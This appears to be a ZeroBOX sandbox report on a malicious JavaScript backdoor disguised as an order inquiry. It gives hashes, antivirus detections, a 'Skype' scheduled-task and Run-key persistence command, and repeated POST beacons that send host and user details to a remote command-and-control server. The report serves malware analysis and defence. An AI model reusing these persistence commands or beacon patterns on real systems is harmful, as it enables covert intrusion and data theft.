Summary | ZeroBOX

Order_inquiry_021_014_21.js

Category  Machine        Started                     Completed
FILE      s1_win7_x6402  Sept. 15, 2021, 12:17 p.m.  Sept. 15, 2021, 12:20 p.m.
Size 16.0KB
Type ASCII text, with very long lines, with no line terminators
MD5 836365de25b8b33c14a7971eeca6151b
SHA256 a51cc3c60ccd7b5ea425e70d4a6d3b66174f6e0b71304e9cc34bd800e54d6bc4
CRC32 39FD302A
ssdeep 384:wLvHm13dN8b4H28naIpRkIfyqcmNxey3hzi8zzHLRsdqjyNLxFcXtqFZaZ:wi1tNXT7PWchmYxsdqjyNNFc0FZaZ
Yara None matched

Name                         Response       Post-Analysis Lookup
grace2020.home-webserver.de  31.210.20.230

IP Address     Status  Action
164.124.101.2  Active  Moloch
31.210.20.230  Active  Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW
  computer_name: TEST22-PC
  Status: 1  Return: 1  Repeated: 0

The identical GetComputerNameW call is recorded 37 times in this section.
Time & API Arguments Status Return Repeated

WriteConsoleW
  buffer: SUCCESS: The scheduled task "Skype" has successfully been created.
  console_handle: 0x00000007
  Status: 1  Return: 1  Repeated: 0
cmdline Schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
Time & API Arguments Status Return Repeated

ShellExecuteExW
  show_type: 0
  filepath_r: Schtasks
  parameters: /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
  filepath: Schtasks
  Status: 1  Return: 1  Repeated: 0
cmdline Schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
Time & API Arguments Status Return Repeated

InternetCrackUrlW
  url: http://grace2020.home-webserver.de:3774/Vre
  flags: 0
  Status: 1  Return: 1  Repeated: 0

HttpOpenRequestW
  connect_handle: 0x00cc0008
  http_version:
  flags: 71303168
  http_method: POST
  referer:
  path: /Vre
  Status: 1  Return: 13369356  Repeated: 0

This InternetCrackUrlW / HttpOpenRequestW pair is recorded 7 times in this section.
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\P7EKOWB6GH reg_value "C:\ProgramData\Order_inquiry_021_014_21.js"
cmdline Schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
Arcabit JS.Heur.Backdoor.2.118C878E.Gen
BitDefender JS.Heur.Backdoor.2.118C878E.Gen
MicroWorld-eScan JS.Heur.Backdoor.2.118C878E.Gen
Ad-Aware JS.Heur.Backdoor.2.118C878E.Gen
Emsisoft JS.Heur.Backdoor.2.118C878E.Gen (B)
FireEye JS.Heur.Backdoor.2.118C878E.Gen
Ikarus Win32.Outbreak
Microsoft TrojanDownloader:Win32/Nemucod!ml
GData JS.Heur.Backdoor.2.118C878E.Gen
ALYac JS.Heur.Backdoor.2.118C878E.Gen
MAX malware (ai score=84)
Time & API Arguments Status Return Repeated

InternetCrackUrlW
  url: http://grace2020.home-webserver.de:3774/Vre
  flags: 0
  Status: 1  Return: 1  Repeated: 0

HttpOpenRequestW
  connect_handle: 0x00cc0008
  http_version:
  flags: 71303168
  http_method: POST
  referer:
  path: /Vre
  Status: 1  Return: 13369356  Repeated: 0

send
  buffer: !
  socket: 1064
  sent: 1
  Status: 1  Return: 1  Repeated: 0

send
  buffer:
    POST /Vre HTTP/1.1
    Accept: */*
    Accept-Language: ko
    User-Agent: psalms-55_7C6024AD\TEST22-PC\test22\Microsoft Windows 7 Professional KN \undefined\\YES\FALSE\
    Accept-Encoding: gzip, deflate
    Host: grace2020.home-webserver.de:3774
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
  socket: 1152
  sent: 304
  Status: 1  Return: 304  Repeated: 0

send
  buffer: !
  socket: 1064
  sent: 1
  Status: 1  Return: 1  Repeated: 0

This sequence of calls is recorded 7 times in this section; the POST request was sent on sockets 1152, 1252, 1252, 1280, 1152, 1276 and 1280 in turn, and in the third repetition no send of "!" precedes the POST.
parent_process wscript.exe martian_process Schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
parent_process wscript.exe martian_process "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\ProgramData\Order_inquiry_021_014_21.js
file C:\Windows\System32\schtasks.exe